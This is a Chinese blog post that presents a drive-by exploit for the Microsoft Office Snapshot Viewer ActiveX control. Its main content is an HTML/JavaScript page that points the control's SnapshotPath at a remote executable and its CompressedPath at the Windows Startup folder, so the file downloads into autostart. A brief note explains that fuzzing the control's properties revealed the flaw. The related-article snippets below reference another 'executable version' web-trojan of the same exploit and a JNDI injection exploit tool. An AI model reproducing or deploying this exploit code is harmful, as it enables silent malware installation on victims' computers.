Microsoft Office Snapshot Viewer ActiveX Exploit

最新推荐文章于 2025-08-23 14:34:25 发布
最新推荐文章于 2025-08-23 14:34:25 发布
阅读量900 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: microsoft office 测试 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iiprogram/article/details/2654027
本文详细介绍了如何通过SnapshotViewer结合CERT提供的dranzer.pdf文件,重现并分析ActiveX控件中的漏洞。重点讨论了在Fuzzing过程中对关键属性和方法的遍历,特别是对SnapshotPath属性的HTTP GET操作检测,以及如何通过进一步测试其他属性来深入理解漏洞机制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞

EXP:

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
var buf1 = 'http://127.0.0.1/a.exe';
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>

Fuzzing时一般是对单个Property和单个Method()做FUZZ,这时会检测到对SnapshotPath有HTTP GET。然后想想它总是需要保存到本地的,再测试其他Property。由于此ActiveX的Property和Method都非常少,很快可以 FUZZ完
iiprogram
关注
Snapshot Viewer报表快照97
12-02
其实2000是带有这个工具的啦,但ACCESS97是没有这个工具的,你可以从这里下载<P> 创建报表快照后,用户即可单独发布生成的快照文件。使用Snapshot ViewerMicrosoft Access可以通过电子邮件传送报表快照  
MS Office Snapshot Viewer ActiveX Exploit
07-16 873
 影响系统: Microsoft Access 2003Microsoft Access 2002Microsoft Access 2000Microsoft Snapshot Viewer 10.0.4622详细:受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.Microsoft
Access很好用的报表快照Snapshot View(snp文件)
VB.Net+Android.java
03-03 4222
Access写数据库程序,还是蛮有用的。快捷、方便,容易上手。报表快照文件Snapshot View.snp
MS Office Snapshot Viewer ActiveX Exploit (可执行版)
weixin_30879833的博客
07-21 137
可执行版,请勿用于非法用途。 <script type="text/javascript"> function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "c:/Program Fi...
stackage-snapshots:LTS Haskell和Stackage Nightly快照配置(实验性,用于食品储藏室)
02-09
堆叠快照 LTS Haskell和每晚的Stackage快照配置(实验性,适用于食品储藏室)
MS Office Snapshot Viewer ActiveX Exploit 最新网马
07-16 895
 经本站焦点核(X)安全技术咨询站测试 确实可以执行 被360拦截 微软尚未发布补丁可执行版,请勿用于非法用途。function killErrors() {return true;}window.onerror = killErrors;var x;var obj;var mycars = new Array();mycars[0] = "c:/Program Files/Outlook
gcviewer-1.36-SNAPSHOT
09-16
gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-...
gcViewer工具gcviewer-1.37-SNAPSHOT.jar
01-31
gcViewer工具 gcviewer-1.37-SNAPSHOT.jar
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
gcviewer-1.36-SNAPSHOT.jar
03-15
gcviewer-1.36-SNAPSHOT.jar 主要是jvm 内存垃圾回收 界面图示展示分析 非常好的一筐工具
FBSnapshotsViewer 项目常见问题解决方案
gitblog_00858的博客
11-21 475
FBSnapshotsViewer 项目常见问题解决方案 项目基础介绍 FBSnapshotsViewer 是一个 macOS 应用程序,旨在帮助开发者查看和分析使用 FBSnapshotTestCase 框架进行快照测试时失败的测试用例。该项目的主要编程语言是 Swift,适用于 iOS 和 macOS 开发。 新手使用注意事项及解决方案 1. 安装问题 问题描述:新手在安装 FBSnapsho...
FBSnapshotsViewer:提升iOS快照测试效率的利器
gitblog_00610的博客
09-08 789
FBSnapshotsViewer:提升iOS快照测试效率的利器 在iOS开发中,快照测试Snapshot Testing)是一种非常有效的测试方法,能够帮助开发者快速验证UI组件的渲染结果。然而,随着Xcode 8之后对插件支持的减弱,传统的快照测试工具逐渐失去了便捷性。为了解决这一问题,FBSnapshotsViewer应运而生,它是一款专为iOS开发者设计的macOS应用程序,旨在简化快照...
微软获评2025年Gartner®容器管理魔力象限™领导者
Leinwin的博客
08-22 683
微软获Gartner容器管理领导者称号,凭借全面解决方案和技术创新,推动容器管理生态发展。
快速了解命令行界面(CLI)的行编辑模式
最新发布
技术分享
08-23 607
命令行高效编辑:Vi与Emacs模式解析 本文系统介绍了Linux/Unix系统中的命令行编辑技术,重点对比了Vi和Emacs两种主流行编辑模式。Vi模式采用模态编辑,区分命令与插入状态,适合精确操作;Emacs模式通过组合快捷键实现无模态编辑,操作更直接。文章详细讲解了两种模式的核心命令、历史操作技巧及相互切换方法,并提供了高效使用历史命令的实用建议。掌握这些编辑技术可显著提升命令行工作效率,减少重复输入和错误率。根据个人习惯选择适合的编辑模式,配合历史命令复用和自定义配置,能在复杂系统操作中游刃有余。
Azure TTS Importer:一键导入,将微软TTS语音接入你的阅读软件!
m0_52224307的博客
08-22 556
**摘要:**Azure TTS Importer是一款开源工具,可一键将微软Azure的文本转语音服务接入主流阅读软件(如Legado、爱阅记等)。它简化了配置流程,保障用户隐私安全,所有数据处理均在本地完成。用户只需输入Azure API信息,即可快速集成高品质AI语音。该项目适合希望通过听书提升效率的用户及开发者参与开源贡献。
Linux 802.11协议栈深度分析与实践指南
X
08-21 322
Linux 802.11协议栈是Linux内核中负责的核心子系统,它实现了IEEE 802.11标准(俗称Wi-Fi)的MAC层和PHY层管理功能。该协议栈采用,由三个主要组件构成:mac80211、cfg80211和nl80211。这些组件协同工作,为Linux系统提供了完整的无线网络连接能力,从到API,形成了多层次的架构体系。Linux 802.11协议栈的架构设计采用了,如下图所示,清晰地展示了用户空间与内核空间之间以及内核内部各组件之间的交互关系:fill:#333;color:#333;
微软 AI 商业智能体将如何颠覆 SaaS?2030 年或成变革元年
葡萄城技术团队博客
08-21 974
摘要:微软预测到2030年AI商业智能体可能颠覆传统SaaS模式。这些智能体具备跨平台整合、自主决策等优势,能打破数据孤岛、降低成本。对国内开发者而言,需关注AI开发框架、低代码平台、数据合规及本地生态整合。未来更可能是;AI+SaaS;的融合进化,开发者需把握技术趋势,开发符合本土需求的智能解决方案。
java -jar gcviewer-1.36-snapshot.jar
11-26
java -jar gcviewer-1.36-snapshot.jar是一个用于分析Java虚拟机垃圾回收日志的工具。通过在命令行中输入该命令,可以运行gcviewer-1.36-snapshot.jar文件,打开相应的图形界面界面以分析垃圾回收日志。该工具可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值